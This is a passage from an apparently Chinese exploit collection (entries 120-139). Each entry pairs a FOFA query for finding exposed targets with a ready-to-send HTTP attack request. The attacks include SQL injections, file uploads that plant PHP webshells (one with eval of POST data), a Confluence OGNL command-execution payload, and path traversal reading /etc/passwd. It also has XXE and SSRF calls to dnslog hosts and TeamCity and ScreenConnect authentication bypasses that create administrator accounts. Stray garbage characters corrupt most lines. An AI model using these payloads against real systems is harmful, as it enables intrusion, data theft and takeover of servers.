src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
& H9 N0 a9 m* N& V. s4 C
3 U$ D. I, E) `& {1 M* y
' _: d% x a& h# {1 X+ L' {: }120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 f3 b& h; Y/ f0 R4 K' L1 V ICVE-2024-1253' T; K& l3 j' W
FOFA:title="Smart管理平台"
) V, q; X& c K2 A0 U# M6 SPOST /useratte/web.php? HTTP/1.1
) p6 T/ s: G" O1 W1 M& o# |; C. eHost: ip:port% U* c4 A2 I/ L* b, F
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
. C. z! B" Y" Y7 k( {User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& N5 z9 t; ?8 M3 v5 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' z, j, n- ^6 }' u3 {# |9 X% yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" \# U6 W- }0 t- KAccept-Encoding: gzip, deflate
" B* J1 I" ]: ~' g8 `, v$ W9 ]Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) {; O. c0 f1 M6 `3 b1 }& \6 [
Content-Length: 597) G, l) O+ u2 O' M
Origin: https://ip:port0 d+ C3 ?5 W8 K/ J
Referer: https://ip:port/sysmanage/licence.php* U, v, o8 ?7 d) G7 U
Upgrade-Insecure-Requests: 1* M* A! c1 t# Z! S
Sec-Fetch-Dest: document
2 w% b9 `5 q! }1 I, OSec-Fetch-Mode: navigate
: c" e1 v; a& \8 T9 c# f/ pSec-Fetch-Site: same-origin5 t! T" l7 {. t# M
Sec-Fetch-User: ?16 e% [0 D2 i4 ? Q
Te: trailers
7 C# ?6 Y, I" oConnection: close
( C `( {! x1 P; k4 z
/ k0 f2 E8 F" {% q-----------------------------42328904123665875270630079328
" E4 E7 K' C. p5 a: h0 X6 l oContent-Disposition: form-data; name="file_upload"; filename="2.php"
# p+ k+ D* k' _Content-Type: application/octet-stream
1 K3 _7 U) r) j% i
. R/ A2 I. O3 G( B6 P9 y. `<?php phpinfo()?>
+ [. m2 q! `5 `3 ? k-----------------------------42328904123665875270630079328
, D5 L U/ x# Z3 ZContent-Disposition: form-data; name="id_type"! z3 W3 \5 ?1 e' I$ Y! D& v/ V
) w, z T3 c: n- `5 z1 k/ ]1 ?, |8 l
1& w6 p$ S7 G! o% F) M( t7 h
-----------------------------423289041236658752706300793286 k6 f/ G+ p9 Z: P5 w; r6 Z
Content-Disposition: form-data; name="1_ck"
Y! {* t- A, l# u! M# P" ? e0 m
& p; h# _/ P1 J1_radhttp
$ U4 b1 L% E' O" E, h* g; j-----------------------------42328904123665875270630079328
3 G) Z/ a4 q1 ]7 n+ m% @( ZContent-Disposition: form-data; name="mode"+ X4 ~# @; {# Y7 }8 D) n
; o, X) e* w# G, F3 Eimport9 w5 c4 n0 ~6 R+ \9 ~$ b1 x
-----------------------------42328904123665875270630079328
( v$ x3 J! x% d& a. c* f0 O
7 V4 k2 j. S$ c/ v
6 {/ I1 L7 L% @# K文件路径/upload/2.php. v2 s5 t1 H: j) Z2 ^5 [4 d( |; L$ E
) w. F: o; \( Y3 o5 [3 f2 Y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 s% g3 j! \) I& H( A; t: e
CVE-2024-1918
& h1 d9 J( z y5 l# c& }7 sFOFA:title="Smart管理平台"# l, T# w$ H: _% _' z( u; q; m
POST /useratte/userattestation.php HTTP/1.1
+ O. D/ D5 x+ p" u N) wHost: 192.168.40.130:8443
. G v# S0 T# h, SCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50- k6 e( ?) k: j
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! q# x3 }4 k, }+ k1 ?; y6 G7 x! e! h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, ]6 G, t8 P& F! fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( \$ M3 e. g: ~% b
Accept-Encoding: gzip, deflate& N: g3 I) o$ ?9 s# G' f3 n
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; v% l {6 T- ^$ [" g8 kContent-Length: 5924 R4 k' O7 W9 A+ L( I: r6 d
Origin: https://192.168.40.130:8443
2 O b4 m2 ?/ |; k- i% y2 ZUpgrade-Insecure-Requests: 1
3 m& c7 S1 c3 h2 ?( ^: ?Sec-Fetch-Dest: document3 w! o& x5 J3 M5 o/ c% ]7 ~
Sec-Fetch-Mode: navigate" I {4 G0 ?; G+ Y1 O# u
Sec-Fetch-Site: same-origin6 M: p1 o" _) b! {8 V6 N( p" ^" i
Sec-Fetch-User: ?1
% r1 R7 f0 d5 Y6 o: b- NTe: trailers
( T( C' E8 j# Y1 i! wConnection: close
* U( x p6 l/ e# m, E6 J& {) I+ d; @. R4 p+ ~; e
-----------------------------42328904123665875270630079328
V, r- E# \5 q; RContent-Disposition: form-data; name="web_img"; filename="1.php"/ u% q8 s/ H$ i: ~: w
Content-Type: application/octet-stream8 W( f/ h( ?1 M( D$ D; v
# |2 Q+ H) A5 p* Q9 S8 K% j
<?php phpinfo();?>
! J6 _ p w( D4 Q( x# b- h-----------------------------42328904123665875270630079328
; R' ^5 M/ p& V6 ^8 ZContent-Disposition: form-data; name="id_type"" N8 |6 q: a$ V" J/ k4 ^. W5 U
& G7 K/ y+ A' G9 {' M; M1
5 [, u; u/ z; e, v-----------------------------42328904123665875270630079328+ n, G+ Y. D, p {
Content-Disposition: form-data; name="1_ck"
2 {/ ^ V/ {; y1 @
" f6 D% m& s% o8 [- q% Y1_radhttp
( N5 `8 G3 {3 m _4 ^4 ]- G-----------------------------42328904123665875270630079328
8 o; U3 G4 U- A3 KContent-Disposition: form-data; name="hidwel"
5 |$ `) }, m/ c# n* I7 [! {+ p, m
set1 I6 J" K( _) w7 ^) j# F8 ]
-----------------------------423289041236658752706300793284 X* [5 x" q- b; {+ l) q
( \: f4 B+ V0 ?( Z$ z$ y2 E. n
2 U2 ?6 K6 @6 y
boot/web/upload/weblogo/1.php: v, F+ L$ x2 s
% T8 o4 z) q% T/ _122. 北京百绰智能s200管理平台/importexport.php sql注入/ h6 A& P0 e$ U( _% e. s S; ?; M
CVE-2024-27718FOFA:title="Smart管理平台"/ l& z8 V" h& e* f7 ~2 n L
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
& ^" l# m& S6 C+ jGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
6 ]: C4 C7 D# r' nHost: x.x.x.x% \' J. V7 W H; P8 C) z
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
Y& K, B2 f7 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ Q4 w+ f+ O/ A" R. zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 y' ~7 O: f' p" J, g6 I+ k2 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* b: F. |& w' j6 k' y) d. f
Accept-Encoding: gzip, deflate, br
A- H; d' h& T3 Z6 `Upgrade-Insecure-Requests: 1
* N9 l/ K' t. W. F3 q; vSec-Fetch-Dest: document
- z" y4 Q' Y% Y/ P8 X1 u! ?* sSec-Fetch-Mode: navigate9 i0 }$ U4 Z3 w+ s. m
Sec-Fetch-Site: none& q1 }, ]( Q( g9 B# T }5 M2 Y
Sec-Fetch-User: ?1
" ]' R/ L( l ?! XTe: trailers# s8 b6 S3 k( s7 }
Connection: close
0 w8 ]3 q9 F8 q4 v$ B
: E. K k- Y6 E
( p1 c- q$ W: j/ t1 Z) V123. Atlassian Confluence 模板注入代码执行
6 j( h" f3 V! HFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"8 U- B# e7 d' {4 j3 a
POST /template/aui/text-inline.vm HTTP/1.1
5 L- Y/ ?) ]( }# OHost: localhost:8090
2 M, B) {( N& g0 N/ M( ~Accept-Encoding: gzip, deflate, br
3 Y& {3 o/ P4 U: y$ UAccept: */*) q, y* T+ Q- y1 f% L3 H; R
Accept-Language: en-US;q=0.9,en;q=0.8
, ], D* [. w. a5 y3 Z9 g7 t% B1 Z; |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
4 b; |! V% g6 M- I% L1 o, u, pConnection: close q8 \1 m, R' b) |% o3 l6 C
Content-Type: application/x-www-form-urlencoded( T3 s: o: T1 Y$ i" K
0 y2 O: |, y* N, @0 k( M
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))2 ]) X/ c5 s$ W7 s
5 F$ I" X+ e2 a! i+ c5 Q) K( B7 R; G. C/ r. a% f+ f) h
124. 湖南建研工程质量检测系统任意文件上传2 x5 I7 }. x, ^8 v8 h' t; `4 l! S. U
FOFA:body="/Content/Theme/Standard/webSite/login.css"
- S4 W! j& \3 e; {+ B3 ^POST /Scripts/admintool?type=updatefile HTTP/1.12 f9 A0 ?- _& G' U) G/ D! m" f5 B
Host: 192.168.40.130:82829 O. H) m0 o, X2 Q0 i
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 q W5 y" D7 T) R, ?. }' dContent-Length: 72
" y2 q) A; X4 f7 `% R" V+ u# L; JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ E5 [0 R9 {2 d1 YAccept-Encoding: gzip, deflate, br. N9 V# m! b/ J% k* m& S( O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 m6 H5 Z' H5 q, \9 _Connection: close4 c* L _7 W2 V1 | D
Content-Type: application/x-www-form-urlencoded" N" y. p/ E6 @- j% ]" Q& C5 c
: d- X7 P) _! ?* r4 }8 r" S
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>$ r) @% ^2 s1 t4 p
% x$ E$ L1 E4 z7 S& k7 a5 m8 t+ c3 q
http://192.168.40.130:8282/Scripts/abcgcg.aspx5 ^/ D5 A* i; {8 k4 O; A$ [
8 {, G. t" F/ c0 R7 O) U
125. ConnectWise ScreenConnect身份验证绕过) P( ^. J; Y9 L) d6 M# A
CVE-2024-1709
8 o2 p# I) z9 x3 {4 nFOFA:icon_hash="-82958153"
# a- P1 K3 K; _5 e( E- d/ shttps://github.com/watchtowrlabs ... bypass-add-user-poc" H, H `. r. ?% W$ N+ @
9 R( ]& w1 \( d! x# W! h8 q! a9 N) N0 m1 a, P3 q
使用方法
9 M. ]& |. ?3 D* F* ?python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!" I$ t4 V# A) I; o! a
7 C5 a/ f: b" [
5 [* Z# |5 K1 R% z, ~" e1 W# K创建好用户后直接登录后台,可以执行系统命令。
/ y6 c( v! `& d
J! A. `2 _ Q$ j2 a1 D, {126. Aiohttp 路径遍历
7 N, N# j" n7 n i7 G' fFOFA:title=="ComfyUI"8 z; B* s% Y0 p6 P
GET /static/../../../../../etc/passwd HTTP/1.1
) ~, ]( }3 }% C; r. rHost: x.x.x.x
* @- r& R3 i; ` r# C" |1 j/ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 s5 @/ c2 h! z2 j% R: p
Connection: close
! U! K0 U5 p1 Z8 O9 [* Z5 _Accept: */*
, ?9 B3 x4 J! n5 S: T# TAccept-Language: en$ y1 Q3 d' V, Q6 c: L
Accept-Encoding: gzip
: X$ q W& i0 ~9 E' y' b: |+ y1 Q5 z
8 G; Y9 {" P# e) d% u3 e4 }5 A4 B! W+ E2 b9 `6 i
127. 广联达Linkworks DataExchange.ashx XXE P, v8 @6 [( q0 `2 f+ B% c
FOFA:body="Services/Identification/login.ashx"
5 t8 O. {7 w8 fPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
5 U6 r8 J, Z3 \* MHost: 192.168.40.130:8888
& ?2 j1 w* j4 u/ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
2 O1 \& L3 A' N7 A! oContent-Length: 415' u8 `2 A. ?4 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: I3 z x2 d/ U2 a) D. Y5 r6 y; Q
Accept-Encoding: gzip, deflate+ D q# J3 ^7 b2 u1 C
Accept-Language: zh-CN,zh;q=0.9& } i0 x2 |8 g! G' Q' t
Connection: close
5 C; }* l( B/ n& SContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0. Y( m! m5 j4 E3 F( e0 L
Purpose: prefetch7 m; p a3 C! t, R1 a& \
Sec-Purpose: prefetch;prerender& Y( V! N: T- Z
# G( C4 }" P- Y j" k( J) _1 ~
------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ A9 C, X5 S: ~+ k9 bContent-Disposition: form-data;name="SystemName"
. D" b4 {6 p) C* x/ i. w8 }7 A$ S+ b
BIM
L5 c% J/ p& M. s' R p, I------WebKitFormBoundaryJGgV5l5ta05yAIe0, ]. `7 A A& A6 [+ x
Content-Disposition: form-data;name="Params"/ y& @3 W) \2 `; C
Content-Type: text/plain
0 k1 X6 C0 K. D. {( G& D/ ?7 }6 B" H0 }8 I
<?xml version="1.0" encoding="UTF-8"?>( |7 K" r! p! W2 L- X
<!DOCTYPE test [
% E( o0 b3 \0 Q" B9 j1 w; X<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
n! F6 ]* |& I% s* \]. l2 u1 a4 L+ }5 D' f* W0 s( o
>
/ |5 |) Y) t9 w4 O h- Z- r9 a, w<test>&t;</test>8 ?+ b/ Y a2 B4 l
------WebKitFormBoundaryJGgV5l5ta05yAIe0--4 A, u* o+ a' a0 I) D; w- I$ d
) E2 x0 U9 T6 k6 x) I' }# k
) Y1 U+ u$ g8 \- m$ B
0 g" v+ ~' ^( W1 X128. Adobe ColdFusion 反序列化 `- O% J) ]2 M% `9 @; O" E, F
CVE-2023-382039 S3 @- I1 d+ O4 |/ `; C% I
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
8 m5 b% | }+ h/ X% j0 ?) KFOFA:app="Adobe-ColdFusion"$ Z+ N. u; v7 B% m+ J0 }1 g0 i
PAYLOAD
3 Q+ N9 T; f; I$ y+ @9 ?
! x, B) |; w+ w4 B: V129. Adobe ColdFusion 任意文件读取! G3 [; t) @4 y+ f: G+ w6 w
CVE-2024-20767& z+ f* D P- M# H+ o1 ]
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
+ f5 @- M: U* A8 S2 H: \, g- X' W" E第一步,获取uuid
& A4 S8 y: E0 q! ?1 b+ \( e6 [% uGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" S3 {& i h5 J% W0 _8 U' f) u
Host: x.x.x.x, d0 T6 Y. [; {1 r5 W$ p$ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 j' F- b8 D; M# k z, B# l
Accept: */*0 }+ @& a6 I* ^
Accept-Encoding: gzip, deflate
2 [9 z! A& m$ d# j+ F& Y/ h; q2 ~/ `Connection: close9 U) p# f( E' o2 g: l
1 {0 F, r. e6 K+ c
/ ~/ U) M. `9 Z( s: k/ m第二步,读取/etc/passwd文件
b7 f7 ?: ?0 f( EGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1% t" t' i4 Y5 U$ j% D
Host: x.x.x.x5 i {# h* \6 W3 b, @- g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: S1 M: p$ A$ f
Accept: */*. P0 \" _/ w* o4 b" H! I
Accept-Encoding: gzip, deflate3 D3 a. Q2 \. e+ O& c' l s1 ]
Connection: close! g2 B4 {7 I0 {, K& c
uuid: 85f60018-a654-4410-a783-f81cbd5000b9" ]1 d' W- _/ V, U6 f& M# w
4 ~7 G2 H( a9 S j8 m. |, O v9 s
' Y* O$ i5 d. i- G1 E130. Laykefu客服系统任意文件上传
+ b# ]5 c+ R% G$ u$ r; `8 j$ I' V* @FOFA:icon_hash="-334624619"9 K( S; ]# E d! { I' N
POST /admin/users/upavatar.html HTTP/1.1# V) d! d! z: O5 ~- E, U
Host: 127.0.0.1
: y2 y$ I* B1 F* A7 }) b4 oAccept: application/json, text/javascript, */*; q=0.01
) A0 m2 x5 h8 k$ v9 h$ ]( X( ^X-Requested-With: XMLHttpRequest
) l5 E4 v& H" [$ I! J* _" sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26' q+ m. w3 e7 Z& G. u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR q1 Y- f' ^6 n: I. w. a
Accept-Encoding: gzip, deflate4 g% H! [* g- w" c, @# H
Accept-Language: zh-CN,zh;q=0.94 E4 X0 W: U" R& M: p7 m. }3 Z8 m
Cookie: user_name=1; user_id=3
+ c* |( G/ s+ \* V; I$ {Connection: close! H/ q' K; K( X2 _& Z& z9 }) u
& k6 ]" x3 q2 a" @
------WebKitFormBoundary3OCVBiwBVsNuB2kR
* t& A' U; v$ Y4 ]4 Z4 IContent-Disposition: form-data; name="file"; filename="1.php"( }$ b. E1 d5 \& ~( `* I; K1 P
Content-Type: image/png1 I6 D; F- `4 Z/ F7 P3 |# p- a
( x' K+ w/ s: n" W, z7 f
<?php phpinfo();@eval($_POST['sec']);?>
) a5 `6 ?4 G% J0 Q/ ~) e------WebKitFormBoundary3OCVBiwBVsNuB2kR--
. [. B$ K, l! Z9 y
& o, K% U5 r9 ~: J# E m
6 Q# w2 M/ G" ]) s131. Mini-Tmall <=20231017 SQL注入/ A9 H0 Q6 ]' }5 j2 @8 W
FOFA:icon_hash="-2087517259"9 a @8 d$ x7 \ v
后台地址:http://localhost:8080/tmall/admin# a) N$ V [0 J' I0 ]7 Y$ T
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 u- e6 b% R5 v9 z7 l' u
' I. }& K3 u) f3 }. O
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& {$ h' X* p9 r( T4 zCVE-2024-27198
$ f' s( Y! J3 l1 r! YFOFA:body="Log in to TeamCity"! p, h( o9 O; u! p+ t/ U
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
+ ~: z( p* z+ \/ ~' Z2 ^( H$ I( mHost: 192.168.40.130:8111& R( ?: K, k$ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& e, N" F$ G% Z: h) Z
Accept: */*: o! p, G# j9 r0 \% u
Content-Type: application/json
0 d9 n; k( @( U; b, Y5 P- qAccept-Encoding: gzip, deflate F$ T* `% z( n2 M* R+ ^+ n
% z6 |" u, i9 U* I- I{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
- g- w9 I7 x7 A4 _- \
; t% I8 g4 N4 ?0 \" u2 @3 X$ V
4 R5 I0 O( K9 @" O$ iCVE-2024-27199
o3 x% a6 G0 e! ~1 I/res/../admin/diagnostic.jsp# s. ~- D% Y }9 ?# W+ f; Q
/.well-known/acme-challenge/../../admin/diagnostic.jsp+ Y5 n7 D- q* i' W2 v) z! \6 ]
/update/../admin/diagnostic.jsp
0 Q- x' I8 K/ A8 E2 h) R7 t* h, L, h3 k7 [% U
8 K2 O/ u1 ~( ]$ v/ E0 @0 y6 s n
CVE-2024-27198-RCE.py9 w U7 Q6 b: F- o% Q9 r" u. E* ]
' ?0 \( L2 a% Y& u
133. H5 云商城 file.php 文件上传
4 h/ s% j6 [7 z4 D( a0 e7 Q' AFOFA:body="/public/qbsp.php"
z* V& T! F9 g$ e" B- zPOST /admin/commodtiy/file.php?upload=1 HTTP/1.13 r# F* m7 k r* Y& I: T
Host: your-ip
4 f; r6 K k5 y, ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. @. A" E+ f6 M* E" z% [! aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx' }" N- I( r% @/ T
1 l' M- c3 h" N+ z------WebKitFormBoundaryFQqYtrIWb8iBxUCx. j1 M' `* P% b9 H5 G; A6 E( G/ P& b
Content-Disposition: form-data; name="file"; filename="rce.php"
0 \0 J8 L$ ^4 I; X+ r6 yContent-Type: application/octet-stream6 K8 L) l! |- I5 W
7 l* E. G8 C+ D5 S w
<?php system("cat /etc/passwd");unlink(__FILE__);?>
$ g6 g3 v7 K3 t------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
; \' i' \1 y+ ?7 M2 \
! D6 V+ p1 C+ `2 E3 Y# U
/ ]- ?/ y, e9 G! d8 n m: B- P ^
' M5 T1 I5 N& `134. 网康NS-ASG应用安全网关index.php sql注入7 d t6 D4 S! H1 [! h
CVE-2024-2330+ ^# ?# Q8 Q- r$ y$ p
Netentsec NS-ASG Application Security Gateway 6.3版本
' p1 O- H7 c* a+ l `FOFA:app="网康科技-NS-ASG安全网关". z. U. Y- w9 U% O& D$ q6 [. _
POST /protocol/index.php HTTP/1.1
% L* p0 r5 x1 jHost: x.x.x.x( k5 e" K' l- _/ S7 E+ [9 |
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
0 [1 }1 z0 w* T- E% a3 p" ?( hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( }4 e. M5 Q5 M- k1 N6 nAccept: */*
' {- b, O- Z9 \, TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ P. q9 m- C' G, Y) Z' X8 ~0 JAccept-Encoding: gzip, deflate
/ r6 c7 c& m) o0 X' e7 hSec-Fetch-Dest: empty
+ Z. t4 P4 D/ ?) ^( ~7 i# ISec-Fetch-Mode: cors3 _/ H6 m/ L" z
Sec-Fetch-Site: same-origin' V/ Z5 h$ L# c: B( N
Te: trailers
7 F, S6 ?4 m! b3 D4 LConnection: close0 X8 \6 P7 [: Y, }# }5 x3 A2 L
Content-Type: application/x-www-form-urlencoded3 p7 |0 b6 H9 U) q' X7 h& C v9 M
Content-Length: 263# Z# f R! w' ?% b
+ D0 L4 Q% Z2 o9 j
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
' H& m$ W) \* a. \- M6 S( B6 t& P6 Q7 d
: i4 X* M G. ]. W135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入: }" h8 Z3 d5 n
CVE-2024-2022
( k) L$ l8 ]4 M+ bNetentsec NS-ASG Application Security Gateway 6.3版本
7 }2 E; y) ~$ c5 h- L+ ?9 ]8 ? OFOFA:app="网康科技-NS-ASG安全网关"* c7 j+ j+ @: H) K1 P
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.10 b' B, }: ] r. B( P
Host: x.x.x.x
% a' P( m& V+ `$ f Z6 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, b; }; Y' }3 V3 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! E! d/ m2 A3 X7 }) ^& d) ~Accept-Encoding: gzip, deflate8 |8 Y6 ~" b; z; ~+ g# n
Accept-Language: zh-CN,zh;q=0.9( P: j0 ~: c- G; ]( {" B1 {& ?
Connection: close9 J9 K- P8 A8 E/ D' C7 r( i
$ a% S$ U& ?1 v
; y' O2 ]- Q% n& z! d1 c% f, C& e136. NextChat cors SSRF
+ X3 e+ e8 e9 D! t: qCVE-2023-49785
; _4 B6 `6 v4 B6 UFOFA:title="NextChat"
+ o( G( C! o' E6 J' r( ~3 U JGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
2 U! t9 k/ I, E7 U' L9 ?Host: x.x.x.x:10000
/ i4 O( l' I# n% iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ W& K1 N( Q1 K& y4 U/ kConnection: close; @) F; o3 Y' h( \2 E6 e
Accept: */*
* V0 i3 @; m2 Y1 P6 F. {& vAccept-Language: en
# e2 O; ~. q. h9 H: SAccept-Encoding: gzip
) m" K M, r0 o" v1 V8 }3 s/ t) f6 p- F Y8 f
+ j2 W' b1 K7 ]- C4 u* h137. 福建科立迅通信指挥调度平台down_file.php sql注入
. `: }; V5 L' z: JCVE-2024-26203 g2 q: ?) c7 r/ j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; O. [# I. U8 ~/ l% ~
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1! t- H0 _9 Q! K a E& t9 Q
Host: x.x.x.x6 I: _0 B5 z' B3 r e- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" X. w0 S) }2 s- Y6 t3 h0 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 N* d% c; m8 P; ^4 e) v* O+ `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& Y2 _" [( E/ B6 u+ |
Accept-Encoding: gzip, deflate, br
$ b3 I4 x& U# |& h1 dConnection: close; a+ u5 m% ~. a1 i- T1 G* F
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
1 ^' V& [) l1 P8 e. T, Q( r. YUpgrade-Insecure-Requests: 13 Q# O5 b( s: M' k
" E* g' U0 ?" |* y, C9 N' R
, M3 i) c8 S: u1 v
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入' M0 Z% U$ r b
CVE-2024-2621# r7 v7 E* _2 m. Z. E
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ r! J1 U( L9 x ^6 s8 V8 S5 y- gGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
/ j' i2 d# W& z& ?% o% ~Host: x.x.x.x
+ {2 s7 P3 \& T5 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: U! o4 o5 O. M. G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; b# @' P6 m5 S$ j+ L+ q! j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 }( l' X: T1 q! Z+ oAccept-Encoding: gzip, deflate, br
( _- K( M/ q0 J. V1 M) WConnection: close
# e% L# G2 z2 j2 N) j* FUpgrade-Insecure-Requests: 1
6 k/ ?+ i/ |' G
: r. i& H0 v. @
. b2 p( c: i) k6 w* W139. 福建科立讯通信指挥调度平台editemedia.php sql注入8 R) V% Z- m5 U+ c7 V( E& l, F
CVE-2024-26226 t& q) T3 t4 `0 O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
